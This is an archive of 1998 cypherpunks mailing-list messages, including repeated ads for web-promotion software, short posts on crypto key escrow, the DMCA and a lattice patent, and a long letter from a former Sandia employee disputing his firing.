Business Journal gives you news and business information the way you think, work, and conduct business. It's powerful. Spend ten minutes a day with us, and imagine what you can accomplish with this kind of intelligence at your fingertips.

Business Journal is your one-stop knowledge management tool.






Have you seen In-Box Direct's Personal Finance section? While you're there, sharpen your investment skills with a free subscription to such publications as Armchair Millionaire News, CBS MarketWatch NewsWatch, and CNNfn Market Briefing.






Talk about the latest web trends in Professional Connections, Netcenter's online discussion forums. Then stop by Member Directory to reach other professionals with interests similar to yours.







Special offer from Music Boulevard: Save $5 on your next order. Whether you're into rock, jazz, classical, or rap, it's on sale for you now at Music Boulevard.









Netscape respects your online time and Internet privacy. If you would prefer not to receive future issues, click here to send an unsubscribe email or reply to this message with the word unsubscribe in the subject line.




Copyright (c) 1998. Netscape Communications Corporation. All rights reserved.
























From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 17202106@05731.com
Date: Wed, 1 Apr 1998 17:39:52 -0800 (PST)
To: Friend@public.com
Subject: Web Promotion Spider
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


             Web Promote Spider

With well over 80 million documents on the web today,
getting your Site   noticed is a difficult process. Going to 
each Search Engine, Link Page,   Directory, and Newsgroup
to manually submit your page could realistically
take weeks to complete.

Announcing the  Web Promote Spider! Created specifically to
meet the needs of those who want their web pages to get
NOTICED and placed   in the TOP of the Search Engines!
The  Spider automates the   process of submitting your site
and uses powerful technology to get your site   listed in the 
TOP positions.

We've developed the  Web Promote Spider for Windows 95
and NT. This amazing program automatically submits your 
site to over 250   (the list grows daily) major search engines and
directories!

PLUS, the  Web Promote Spider has an Expert HTML Reader
system inside. It will change certain contents of your html text and
automatically prepare needed information for online registration 
in Search   Engines to Optimize your pages and get them listed
on TOP. Originally   engineered for use by the professional
advertising industry, this program is  easy and intuitive to use. 
Beginners will be amazed at how simple it is to take   complete
control over their search engines and index marketing efforts. 

The Web Promote Spider is an industrial strength marketing
tool and an extremely valuable part of any publicity campaign.
With this kind   of power, it should come as no surprise that 
many of our customers have even   built profitable on-line
promotional businesses with this product and their
existing Internet connection!

With your payment of only $49.95 (standard version) you will 
receive the  current Web Promotion Spider program. Also, you
can have all the new  upgrades FREE. Each upgrade will have
a list of new Internet Search  Engines/Online Directories and, 
of course, new features. 

Plus, you get free upgrades which come out twice a month
with new features   and new search engines. Register now 
and you'll continue to get our upgrades,   which keep the 
program up-to-date and getting better and better! Now
submitting to 250+ search engines, free.

We are proud to announce that we now have two powerful 
versions of the Web Promote Spider, our Standard Version 
and our brand new Pro Version. Our Standard Version is 
designed for those individuals who have one or two sites
that they want to be able to submit, and want to see dramatic 
increases in their sites visibility. Our Pro Version is designed
for ISP's, Webmasters,   Hosting Providers, and anyone who 
has multiple sites they need to promote   thoroughly. While the 
standard version does track all registration campaigns
for you, it can still be somewhat time intensive if you register 
several sites at   once, or on a regular basis.

You can see   why the Web Promote Spider is taking the Net
 by storm!

Professional Version

While the standard version of this product seems to meet the 
promotional needs of most of our customers, we also recognize
the need for an 'industrial strength' version of  Web Promote Spider.

The Professional Version is designed for ISP's, Webmasters,
Hosting Providers, and anyone who has multiple sites they need
to promote thoroughly. While the standard version tracks all registration
campaigns for you, it can still be time intensive if you have to register
several sites at once.

To make this easier and more efficient for our customers, we have
added several new features to the brand new Professional Version:

Deep Promotion - This feature will automatically explore every
internal link in your site, and develop registration information for 
each page for you automatically. For instance, in the standard
version, if you have a 30 page site, you would have to run  Web 
Promote Spider thirty times, manually inputting each page into 
the registration queue. In the professional version, this is
all automatic, and can be done in a matter of minutes.

Batch Processing - If you are responsible for registering or 
maintaining several sites, you will find this feature particularly 
useful. You can load in multiple sites, and set the program to
run all the sites at once, generating and saving a separate
registration report on each. This report can easily be copied 
to the Windows clipboard for pasting into reports, email, etc.
Expanded Promotion Resources - While the standard version
of the Spider will submit to 250 registration resources this list
will continue to grow but not as quickly as what's being planned
on the professional version. The Pro Version currently has 400
and will soon have at least 1,000 automatic registration 
options/resources.

If you're a previous owner of the Standard Version, the cost is
only $49.95 to upgrade! If you're a first time user and would like
to start using the Pro Version right away, the cost is $99.90.

                                To Order

Order by fax or mail  Visa or Mastercard

Fax: (425) 379-9722
Mail to: SYS
              11014 19th Ave SE Suite 305
               Everett, WA 98208

We will give you the address to download the program
or for an extra $10.00 we'll send your the program
on CD-Rom

Name:_______________________

Address:_____________________

City:________________

State:________________

Zip:________________

Home Phone:___________________

Work Phone:____________________

Fax:____________________

E-mail_________________

__Standard Version $49.95

__Pro Version   $99.90

__Upgrade $49.95 (From Standard to Pro, if you already 
                                   have the standard version)

___Send CD-Rom $10.00

___Provide download address..No Charge

_____Total

Visa___MasterCard____

Account number:_______________

Expiration Date:________________

I understand that all sales are final.

_______________________
     Signature

---------------------------------------------------------------------------

















   






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 45201204@13080.com
Date: Mon, 6 Apr 1998 10:47:43 -0700 (PDT)
To: Friend@public.com
Subject: Web Promotion Spider
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


             Web Promote Spider

With well over 80 million documents on the web today,
getting your Site   noticed is a difficult process. Going to 
each Search Engine, Link Page,   Directory, and Newsgroup
to manually submit your page could realistically
take weeks to complete.

Announcing the  Web Promote Spider! Created specifically to
meet the needs of those who want their web pages to get
NOTICED and placed   in the TOP of the Search Engines!
The  Spider automates the   process of submitting your site
and uses powerful technology to get your site   listed in the 
TOP positions.

We've developed the  Web Promote Spider for Windows 95
and NT. This amazing program automatically submits your 
site to over 250   (the list grows daily) major search engines and
directories!

PLUS, the  Web Promote Spider has an Expert HTML Reader
system inside. It will change certain contents of your html text and
automatically prepare needed information for online registration 
in Search   Engines to Optimize your pages and get them listed
on TOP. Originally   engineered for use by the professional
advertising industry, this program is  easy and intuitive to use. 
Beginners will be amazed at how simple it is to take   complete
control over their search engines and index marketing efforts. 

The Web Promote Spider is an industrial strength marketing
tool and an extremely valuable part of any publicity campaign.
With this kind   of power, it should come as no surprise that 
many of our customers have even   built profitable on-line
promotional businesses with this product and their
existing Internet connection!

With your payment of only $49.95 (standard version) you will 
receive the  current Web Promotion Spider program. Also, you
can have all the new  upgrades FREE. Each upgrade will have
a list of new Internet Search  Engines/Online Directories and, 
of course, new features. 

Plus, you get free upgrades which come out twice a month
with new features   and new search engines. Register now 
and you'll continue to get our upgrades,   which keep the 
program up-to-date and getting better and better! Now
submitting to 250+ search engines, free.

We are proud to announce that we now have two powerful 
versions of the Web Promote Spider, our Standard Version 
and our brand new Pro Version. Our Standard Version is 
designed for those individuals who have one or two sites
that they want to be able to submit, and want to see dramatic 
increases in their sites visibility. Our Pro Version is designed
for ISP's, Webmasters,   Hosting Providers, and anyone who 
has multiple sites they need to promote   thoroughly. While the 
standard version does track all registration campaigns
for you, it can still be somewhat time intensive if you register 
several sites at   once, or on a regular basis.

You can see   why the Web Promote Spider is taking the Net
 by storm!

Professional Version

While the standard version of this product seems to meet the 
promotional needs of most of our customers, we also recognize
the need for an 'industrial strength' version of  Web Promote Spider.

The Professional Version is designed for ISP's, Webmasters,
Hosting Providers, and anyone who has multiple sites they need
to promote thoroughly. While the standard version tracks all registration
campaigns for you, it can still be time intensive if you have to register
several sites at once.

To make this easier and more efficient for our customers, we have
added several new features to the brand new Professional Version:

Deep Promotion - This feature will automatically explore every
internal link in your site, and develop registration information for 
each page for you automatically. For instance, in the standard
version, if you have a 30 page site, you would have to run  Web 
Promote Spider thirty times, manually inputting each page into 
the registration queue. In the professional version, this is
all automatic, and can be done in a matter of minutes.

Batch Processing - If you are responsible for registering or 
maintaining several sites, you will find this feature particularly 
useful. You can load in multiple sites, and set the program to
run all the sites at once, generating and saving a separate
registration report on each. This report can easily be copied 
to the Windows clipboard for pasting into reports, email, etc.
Expanded Promotion Resources - While the standard version
of the Spider will submit to 250 registration resources this list
will continue to grow but not as quickly as what's being planned
on the professional version. The Pro Version currently has 400
and will soon have at least 1,000 automatic registration 
options/resources.

If you're a previous owner of the Standard Version, the cost is
only $49.95 to upgrade! If you're a first time user and would like
to start using the Pro Version right away, the cost is $99.90.

                                To Order

Order by fax or mail  Visa or Mastercard

Fax: (425) 379-9722
Mail to: SYS
              11014 19th Ave SE Suite 305
               Everett, WA 98208

We will give you the address to download the program
or for an extra $10.00 we'll send your the program
on CD-Rom

Name:_______________________

Address:_____________________

City:________________

State:________________

Zip:________________

Home Phone:___________________

Work Phone:____________________

Fax:____________________

E-mail_________________

__Standard Version $49.95

__Pro Version   $99.90

__Upgrade $49.95 (From Standard to Pro, if you already 
                                   have the standard version)

___Send CD-Rom $10.00

___Provide download address..No Charge

_____Total

Visa___MasterCard____

Account number:_______________

Expiration Date:________________

I understand that all sales are final.

_______________________
     Signature

---------------------------------------------------------------------------

















   






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Fri, 1 May 1998 13:09:24 +0800
To: cypherpunks@cyberpass.net
Subject: Re:  Canadian Crypto GAK [slashdot.org]
Message-ID: <199805010502.BAA01799@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text



   >   From: Jim Choate <ravage@ssz.com>
   >   
   >   > X-within-URL: http://www.slashdot.org/
   >   
   >   >    Crypto in Canada Posted by CmdrTaco on Thursday April 30 at 3:58 pm
   >   >    EST
   >   >    Encryption from the its-everywhere dept
   >   >    Eric Howe sent us This link where you can read about Canada's latest
   >   >    development in encryption. Looks like they want to have keys just like
   >   >    Uncle Sam.

They have no choice: they are part of the UKUSA alliance.

---guy, Vulis Terminator




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvcm.com>
Date: Mon, 4 May 1998 02:39:35 +0800
To: cypherpunks@cyberpass.net
Subject: Re: The Usual Suspects (National sales tax)
In-Reply-To: <199805030855.KAA18049@basement.replay.com>
Message-ID: <v03102803b17244abad8a@[24.234.31.56]>
MIME-Version: 1.0
Content-Type: text/plain



>From my perspective, one of the most important fallouts from a replacement
of the graduated tax with a national sales tax is the removal of much of
the current rationale for FinCEN and citizen identification (i.e., SSN).
Certainly, it should no longer be required for establishing a non-credit
financial institution account, purchasing a money order/cashier's check or
wiring money.  In fact, you shouldn't need SSN for employment, except that
unless you supplied some number (even if psueduanon) you'd forego accruing
benefits.  The use of SSN for the ID runs the gammut in local, state and
federal programs, but is most often justified for purposes of taxation.

Now, I'm not naive enough to believe that any of these gov't agencies or
private corps are going to willing give up citizen unit IDs, but it will be
interesting to see their new rationales for the continued use of SSN (or
its replacement) for ID.

--Steve

--Steve

---------------------------------------------------------------------
		reply to schear - at - lvcm - dot - com ---

PGP mail preferred, see  	http://www.pgp.com and
				http://web.mit.edu/network/pgp.html

RSA fingerprint: FE90 1A95 9DEA 8D61  812E CCA9 A44A FBA9
RSA key: http://keys.pgp.com:11371/pks/lookup?op=index&search=0x55C78B0D
---------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>Wordsmith <wsmith@wordsmith.org>
Date: Mon, 11 May 1998 14:20:47 +0800
To: cypherpunks@toad.com
Subject: [Fwd: A.Word.A.Day--hieroglyphic]A.Word.A.Day--hieroglyphic
Message-ID: <35569417.4972@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: message/rfc822



hieroglyphic (hy-uhr-o-GLIF-ik, hy-ruh-)    also hieroglyphical adjective

   1. Of, relating to, or being a system of writing, such as that of ancient
      Egypt, in which pictorial symbols are used to represent meaning or
      sounds or a combination of meaning and sound. Written with such
      symbols.

   2. Difficult to read or decipher.

hieroglyphic noun

   1. A hieroglyph. Often hieroglyphics (used with a sing. or pl. verb.
      Hieroglyphic writing, especially that of the ancient Egyptians).

   2. Something, such as illegible or undecipherable writing, that is felt
      to resemble a hieroglyph.

[French hieroglyphique, from Late Latin hieroglyphicus, from Greek
hierogluphikos : hieros, holy. See eis-. + gluphe, carving (from gluphein,
to carve.]
 
   "The fascination with hieroglyphics, with emblems and impresas, or
   `pictures without words,' as Ernst Robert Curtius tells us, has
    continually occupied the minds of Western humanists since the beginning
    of the fifteenth century. "
   Zhang Longxi, What is 'wen' and why is it made so terribly strange?.,
   Vol. 23, College Literature, 02-01-1996, pp 15(21). 
 
This week's theme: words about symbols.
 
...........................................................................
Our lives begin to end the day we become silent about things that matter. 
-Dr. Martin Luther King, Jr.
 
Send your comments about words to anu@wordsmith.org.  To subscribe or
unsubscribe A.Word.A.Day, send a message to wsmith@wordsmith.org with 
"Subject:" line as "subscribe <Your Name>" or "unsubscribe".  Archives,
FAQ, gift subscription form, and more at: http://www.wordsmith.org/awad/







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Luke Farar <lfarrar@chsch.demon.co.uk>
Date: Mon, 18 May 1998 12:20:00 +0800
To: cypherpunks@toad.com
Subject: remove
Message-ID: <355CF548.1F08@chsch.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



remove




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs <StanSqncrs@aol.com>
Date: Mon, 25 May 1998 00:18:08 +0800
To: cypherpunks@toad.com
Subject: Re: Unix O/S
Message-ID: <3d984dc3.3568457b@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



In a message dated 5/24/98 4:58:12 AM Central Daylight Time, nobody@REPLAY.COM
writes:

<< Your new proposal merits inclusion, however. All those in favour of
 banning anonymous posting can show their support by 
 responding to the thread via an anonymous remailer. >>

The joke's not that funny the 2nd time around either!

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: verify@nytimes.com (New York Times subscription robot)
Date: Mon, 1 Jun 1998 08:23:57 +0800
To: cypherpunks@toad.com
Subject: Welcome to The New York Times on the Web
Message-ID: <199805310413.AAA28990@content9a.nytimes.com>
MIME-Version: 1.0
Content-Type: text



Welcome, nyt_blows,

Thank you for registering for The New York Times on the Web.  

****************************
ABOUT YOUR REGISTRATION 
****************************
Your subscriber ID is nyt_blows 
You selected your password at registration.
Your e-mail address is cypherpunks@toad.com    

We encourage you to print this message and save it for 
future reference.  If you have any questions about your 
registration we can find your account using the ID
and e-mail address listed above.

Unless you chose otherwise, your ID and password
have been saved on your computer so that you do not have to
enter them each time you visit our site.  Please keep in mind
that you can enter this ID and password on any computer 
to reach our Web site, so if you change computers or
install a new browser, there is no need to re-register.  If you
forget your password, please do not re-register.  You can retrieve
your password in the Help Center by clicking "Help" anywhere 
on the site.

For more information about the site and your registration, please
visit the Help Center at:

http://www.nytimes.com/subscribe/help/

*****************************************
ABOUT THE NEW YORK TIMES ON THE WEB
*****************************************

The New York Times on the Web combines the quality 
news coverage, authority and integrity of The New York Times 
with the immediacy, utility and depth of the Internet.  Our site 
includes daily contents from The Times, news updates 
every ten minutes from the Associated Press and throughout 
the day from New York Times editors, a low-cost 365-day 
archive of New York Times articles, and original reporting 
exclusive to the Web in CyberTimes.

The Times on the Web also features: 
** Up-to-the-minute sports scores and statistics 
** Current weather conditions and 5-day forecasts for over 
1,500 cities worldwide
** A searchable library of more than 50,000 book reviews
** Custom stock portfolios 
** Searchable Real Estate and Help Wanted listings 
** Subscription service to the Crossword Puzzle, Bridge 
and Chess columns    

Thank you for registering.  

Visit us again soon at:  http://www.nytimes.com

*****************************************

Please do not reply to this message.  If you did not 
authorize this registration, someone has mistakenly
registered using your e-mail address.  We regret 
the inconvenience; please FORWARD this message
to cancel@nytimes.com and we will remove it from
our records.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ixion <aa@swipnet.se>
Date: Mon, 3 May 1999 03:59:30 +0800
To: cypherpunks@toad.com
Subject: usubscribe
Message-ID: <199905021925.VAA07543@mb06.swip.net>
MIME-Version: 1.0
Content-Type: text/plain



usubscribe


Life is a dream




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Corvus Corvax" <corvuscorvax@hotmail.com>
Date: Fri, 1 May 1998 08:34:52 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Bad, bad, bill
Message-ID: <19980501153418.25294.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain


NYT this morning reports the that the Digital Millenium Copyright Act 
was adopted by the Senate Judiciary Committee:

"WASHINGTON - The Senate Judiciary Committee on Thursday adopted the 
Digital Millennium Copyright Act, which takes a new step toward 
protecting creative content in cyberspace by outlawing the equipment 
used to commit a copyright infringement, not just the act or intent of 
illegally copying material. 
...
Most visibly absent was any exemption for devices used in encryption
research, an issue Senate leaders said they hope to work out before the 
bill goes to the floor. "

There's been a good deal of discussion of this issue around here, to be 
sure. But I think maybe it bears repeating that even with some kind of 
narrow exemption for "encryption research", this bill is conveniently 
poised to be used not only against Evil Copyright Infringers, but also 
against the kind of troublemakers that expose, for instance, the 
deliberate weakening of GSM authentication.

Gawd. What bullshit.


571830573294323629934765012348436263285853260687657402192238

Corvus Corvax

324908584730535672342307543875016719214012473014020239437239


______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 1 May 1998 07:07:46 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Ajtai Lattice Patent
Message-ID: <199805011407.KAA02703@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


30 April 1998, Micropatent:

Cryptosystem employing worst-case difficult-to solve lattice 
problem (Assignee -- International Business Machines 
Corporation)

Abstract: A cryptosystem and cryptographic method are 
provided for performing tasks such as encoding/decoding, 
signing messages, and verifying identity. The system and 
method employ a problem which is difficult to solve in the 
worst case. Because of the worst-case nature of the 
problem employed, a system and method according to the 
invention has advantageous level of security, In a class of 
preferred embodiments, the difficult problem is one of the 
recognized difficult problems associated with the mathematical 
theory of lattices. These problems include finding short 
vectors and sets of basis vectors from a lattice. Cryptographic 
protocols are performed, using these problems. 

Ex Claim Text: A cryptographic communications system A 
comprising: a communications channel; means for generating 
a public key and a corresponding private key based on an 
instance of a problem, the problem being difficult to solve in 
the worst case, the instance of the problem  being difficult to 
solve, commensurate with the difficulty of the  worst-case 
solution of the problem; and means for performing a 
cryptographic communication protocol, employing the public 
and private keys generated by the means for generating, with 
another cryptographic communications system B over the 
communications channel. 

Patent Number: 5737425 

Issue Date: 1998 04 07 

Inventor(s): Ajtai, Miklos

If you would like to purchase a copy of this patent, please call 
MicroPatent at 800-648-6787. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Fri, 1 May 1998 09:26:02 -0700 (PDT)
To: lawya@lucs-01.novell.leeds.ac.uk
Subject: US legal system
Message-ID: <3549F6B2.542F@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Friday 5/1/98 10:02 AM

Yaman Akdeniz

The US court system has largely deteriorated to become part of the US
Federal bureaucracy
[aka Big Brother ... or probably more accurate, the Great Satan
http://www.aci.net/kalliste/speccoll.htm and
http://caq.com/CAQ/caq63/caq63madsen.html].

1  Judges and court clerks try to do what they want whether it conflicts
with law or not.

2  Lawyers and the US court system attempt to make it appear that there
IS NO LEGAL
REMEDY POSSIBLE without hiring a lawyer.  And the client will most
likely lose both 
money and the case.

Morales and I [http://jya.com/whpfiles.htm] are trying to change 1 and
2.

Later
bill


Wednesday  4/1/98  11:02 AM

Certified   Return receipt requested

Proctor Hug  Jr
Chief Judge, Ninth Circuit
50 West Liberty 
Street
Reno, NV 89501-1948
(702) 784-5631
784-5166 fax


Dear judge Hug:


Purposes of this letter-affidavit are to file criminal complaint affidavits against

1  judge Marilyn Hall Patel for not properly processing a  criminal  violation of the Privacy Act, 

2  former Ninth Circuit chief judge J Clifford Wallace for not properly  processing criminal complaint affidavits for

    a  felony perjury violation by Sandia National Laboratories lawyer  Gregory Cone,

    b  judge Fern Smith for not properly processing a felony perjury  violation by Sandia National Laboratories    
      lawyer Gregory Cone. 

    c  Albuquerque FBI special agent in charge Thomas Kneir for sending  FBI agents Kohl and Schum to my 
        home in an attempt to intimidate me from exercising my civil rights.
   
    d  Margret D. Thomas, Judicial Assistant to the Honorable Marilyn Hall  Patel, for not forwarding a valid 
        criminal complaint affidavit  regarding a criminal violation of the Privacy Act to Patel.

Brief history would be valuable for your understanding of this matter.

  Sandia has long been involved with the security of America's nuclear  arsenal. As they announce on their website: "We are funded primarily by  the U.S. Department of Energy to design all the non-nuclear opponents of  the nation's nuclear weapons" 
   
http://www.sandia.gov/">http://www.sandia.gov/</a>). 

  This includes the cryptographic locks used to secure the nukes.  

  NSA supplies the algorithms and implementation guidelines to Sandia.  
  
http://www.aci.net/kalliste/nukearse.htm

In about 1982 I became project leader of the Missile Secure Cryptographic Unit [MSCU].

The MSCU was funded by the National Security Agency [NSA].

As a result of my about 4 year work with NSA, I was given access to its cryptographic algorithms by one document and many electronic schematics.

I wrote a book

            ISBN: 0125475705
            Title: Embedded Controller Forth For The 8051 Family
            Author: Payne
		Cover: Hardback/Cloth
            Imprint: Academic Press
            Published: September 1990

http://www.apcatalog.com/cgi-bin/AP?ISBN=0125475705&LOCATION=US&FORM=FORM2

about the software technology we used for the MSCU.

In 1986 I transferred to build the data authenticator for the Department of Energy's Deployable Seismic Verification System [DSVS]for the Comprehensive Test Ban Treaty [CTBT].

NSA liaison for the DSVS/CTBT project offered information to me that NSA regarded former president Reagan as one of the US's foremost traitors for the reason  

  First, U.S. President Ronald Reagan informed the world on national television that the United States was     
  reading Libyan communications.  This admission was part  of a speech justifying the retaliatory bombing of 
  Libya for  its alleged involvement in the La Belle discotheque   bombing in Berlin's Schoeneberg district, 
  where two U.S.  soldiers and a Turkish woman were killed, and 200 others  injured. Reagan wasn't talking 
  about American monitoring of   Libyan news broadcasts. Rather, his "direct,  precise, and  undeniable proof" 
  referred to secret (encrypted) diplomatic  communication between Tripoli and the Libyan embassy in East 
  Berlin.

http://www.aci.net/kalliste/speccoll.htm

which is further explained at http://caq.com/CAQ/caq63/caq63madsen.html

  It may be the greatest intelligence scam of the century: For decades, the US has routinely intercepted and
  deciphered top secret encrypted messages of 120 countries.

In early 1992 a Sandia labs director decided that he and his subordinates were going to enter the data authentication business.

The director transferred me to break electronic locks for the Federal Bureau of Investigation.  

This work was funded by the FBI/Engineering Research Facility [FBI/ERF], Quantico, VA.

I ordered about $200,000 of the FBI/ERF's money buying two copies of electronic locks.

One lock I ordered was the Hirsch Scramblepad electronic lock.

In about 1991 I was following progress of lawsuits in the district of Northern California,

  The first two cases to directly address the issue of  intermediate copying both originated in California's
  Northern District Court.  They are Atari v. Nintendo and  Sega v. Accolade.  In both cases, the district court 
  found that intermediate copying was NOT fair use.

  [The New Use of Fair Use:  Accessing Copyrighted Programs Through 
  Reverse Engineering, Stephen B. Maebius, Journal of the Patent and 
  Trademark Office Society, June 1993, 75, n6, p433]

Judge Fern Smith presided in both cases.

Reason I was following Atari v Nintendo was that I my Forth book I have two chapters on reverse engineering software.

One chapter contains a computer program which copied a ROM BIOS to diskette.

Smith's decisions made my intermediate copying program illegal.

  In a strong opinion she [Fern Smith] wrote in March 1991,  when granting Nintendo's request for a           
  preliminary  injunction against Atari, she lambasted Atari's lawyers for  thievery.

I was given the job assignment to copy the ROMs of Hirsch's 8051-based Scramblepad electronic lock to reverse engineer them to hopefully allow me to modify the locks for allow surreptitious entry.

I refused to engage in illegal activity for the FBI.

The termination letter seen at http://jya.com/whpfiles.htm states

  This is to advise you that effective July 27, 1992, you  will be terminated from Sandia National Laboratories.   
  This action is the results of your flagrant attack on a valued   Sandia customer and repeated insensitivity to 
  security/classification requirement.  These acts violate   Sandia National Laboratories Code of Conduct, 
  specifically  the Personal Conduct section,, and the Safeguarding  Information and Records Section. ...

for my whistleblowing SAND report on the National Security Agency's deficient work and refusing to mark classified on a report I and Danny Drummond wrote on how to fake Wiegand Wire access entry credentials for the FBI.

Both I and my EEOC complaint officer Ray Armenta were never able to determine exactly why I was fired.

However March 22, 1997 I received copies of the enclosed

  1  April 15, 1994 letter to EEOC director Charles Burtner  from Sandia Diversity Leadership director 
      Michael G. Robles.

  2  July 27, 1997 Termination of Employment memorandum containing my signature.

  3  DISCIPLINARY REVIEW COMMITTEE MINUTES, July 16, 1992.

  4  DISCIPLINARY REVIEW COMMITTEE MINUTES, July 6, 1989.

  5  September 6, 1995 letter from EEOC Investigator Larry J. 
     Trujillo to Richard Gallegos.

from Sandian Richard Gallegos.

Sandia lawyer Harold Folley previously stated that no documents existed.

The Privacy Act states

  (d) Access to Records.--Each agency that maintains a system
  of records shall--
            (1) upon request by any individual to gain access
        to his record or to any information pertaining to him
        which is contained in the system, permit him and upon
        his request, a person of his own choosing to accompany
        him, to review the record and have a copy made of all
        or any portion thereof in a form comprehensible to him,
        except that the agency may require the individual to
        furnish a written statement authorizing discussion of
        that individual's record in the accompanying person's
        presence;

The Sandia Disciplinary Review Committee NEVER interviewed me to check the veracity of their statements.

The Privacy Act states

  (2) permit the individual to request amendment of a record pertaining to     
  him and--

The statements in the SDRC are incorrect. I followed all Sandia procedures known to me.  I did nothing wrong.

I had no opportunity to defend myself.  My rights guaranteed under the Constitution, Bill of Rights, Article XIV.

  Section 1. All persons born or naturalized in the United States, and   
  subject to the jurisdiction thereof, are citizens of the  United States  
  and of the State wherein they reside. No State shall make or enforce any 
  law which shall abridge the privileges or immunities of citizens of the 
  United States; nor shall any State deprive any person of life, liberty, 
  or property, without due process of law; nor deny to any person within 
  its jurisdiction the equal protection of the laws.

have been violated.

C My permission was never asked to release these records to Gallegos.

As you may realize about the Privacy Act

  (b) Conditions of Disclosure.--No agency shall disclose any
  record which is contained in a system of records by any means
  of communication to any person, or to another agency, except
  pursuant to a written request by, or with the prior written
  consent of, the individual to whom the record pertains ...

The Privacy Act allows imposition of criminal penalties for those like members of the SDRC, Robles, Burtner,  and Trujillo who 

  (i)(1) Criminal Penalties.--Any officer or employee of an
  agency, who by virtue of his employment or official position,
  has possession of, or access to, agency records which contain
  individually identifiable information the disclosure of which
  is prohibited by this section or by rules or regulations
  established thereunder, and who knowing that disclosure of the
  specific material is so prohibited, willfully discloses the
  material in any manner to any person or agency not entitled to
  receive it, shall be guilty of a misdemeanor and fined not more
  than $5,000.
    (2) Any officer or employee of any agency who willfully
  maintains a system of records without meeting the notice
  requirements of subsection (e)(4) of this section shall be
  guilty of a misdemeanor and fined not more than $5,000.

I forward criminal complaint affidavits on the above individuals to selected magistrate judge Marilyn Hall Patel.

Patel ignored my complaints. 

I return to the subject of breaking electronic locks for the FBI/ERF.

Smith's two decisions were overturned on appeal.

  However, both cases have been overruled on appeal. In the
  ground-breaking Atari decision, the Federal Circuit held
  that intermediate copying was a fair use.  The Sega
  decision, which was appealed to the Ninth Circuit Court of
  Appeals, similarly overruled the district court and held
  that intermediate copying may be fair use.

Sandia patents and trademark lawyer Gregory A. Cone in the enclosed affidavit for a ADEA lawsuit I filed in the District of New Mexico stated

  AFFIDAVIT OF GREGORY A. CONE

  Gregory A. Cone, being duly sworn, deposes and states:

  1. I am employed by Sandia Corporation.  I am an attorney
  admitted to practice law in the State of California and before the
  U. S. Patent and Trademark Office and concentrate on legal issues
  related to patent and copyright law.  In that capacity, I am 
  familiar with activities at the Sandia National Laboratories
  ("Sandia") as they related to what is sometimes referred to as
  "reverse engineering ." ...

  [I]t is the general view at Sandia that disassembly of "object
  code" under such circumstances constitutes a "fair use" of
  copyrighted software under 17 U.S.C. article 107 and is thus
  permissible.  Sandia bases its view on Sega Enterprises v.
  Accolade, Inc. 977 F.2d 1510, 24 U.S.P. Q. 2d 1561 (9th Cir.
  1992), amended, 1993 U. S. App. LEXIS 78, and Atari Games Corp
  v. Nintendo of America, Inc, 975 F.2d 832 (Fed. Cir. 
  1992).  ...

  FURTHER, Affidavit sayeth naught.
                                 
  (signed)
  GREGORY A. CONE

  SUBSCRIBED, SWORN TO and ACKNOWLEDGED before me on this 12th
  day of August, 1993, by Gregory A. Cone."
  (signed)
  Mary A. Resnick

  Notary Public

  My Commission Expires:

  2-7-94

Cone has the two citations reversed.  The U. S. Patent Quarterly references the Atari v Nintendo lawsuit 1510 should be corrected to 1015.

Cone issued the above affidavit to District of New Mexico federal court in attempt to show that I had no legal reason to refuse to  reverse engineer the Hirsch Scramblepad electronic lock.

I was covered under 10 C.F.R. 708 - DOE CONTRACTOR EMPLOYEE PROTECTION PROGRAM for my refusal to reverse engineer the Hirsch Scramblepad code.   

  708.1 Purpose,
  This part establishes procedures for timely and effective 
  processing of complaints by employees of contractors performing
  work at sites owned or leased by the Department of Energy (DOE),
  concerning alleged discriminatory actions taken by their employers
  in retaliation for the disclosure of information relative to health 
  and safety, mismanagement, and other matters as provided in 708.5(a),
  for participation in proceeding before Congress, or for the refusal
  to engage in illegal or dangerous activities." ...

Cone's affidavit attempts to create the appearance that reverse engineering was legal before July 27, 1992, the date of my firing.

  Title 18, Chapter 79, Article 1623 felony perjury.     

  Article 1623 - False declarations before grand jury or court
 (a) Whoever under oath (or in any declaration, certificate,
 verification, or statement under penalty of perjury as permitted 
 under section 1746 of title 28, United States Code) in any
 proceeding before or ancillary to any court or grand jury of
 the United States knowingly make any false material declaration 
 or makes or uses any other information, including any book, paper,
 document, record, recording, or other material, knowing the same
 to contain any false material declaration, shall be fined not more
 than $10,000 or imprisoned not more than five years, or both.
 
Decision of the Atari Games Corp. v. Nintendo of America appeal cited at page 1016 from 24 USPQ 2d was Decided SEPTEMBER 10, 1992.  

I was fired JULY 27, 1992 so my work assignment was illegal at the time I refused.

Therefore, Cone committed felony perjury IN WRITING filed with New Mexico District Federal Court.

Chronological review of criminal complaint affidavits would be valuable before I present the current criminal complaint affidavits.

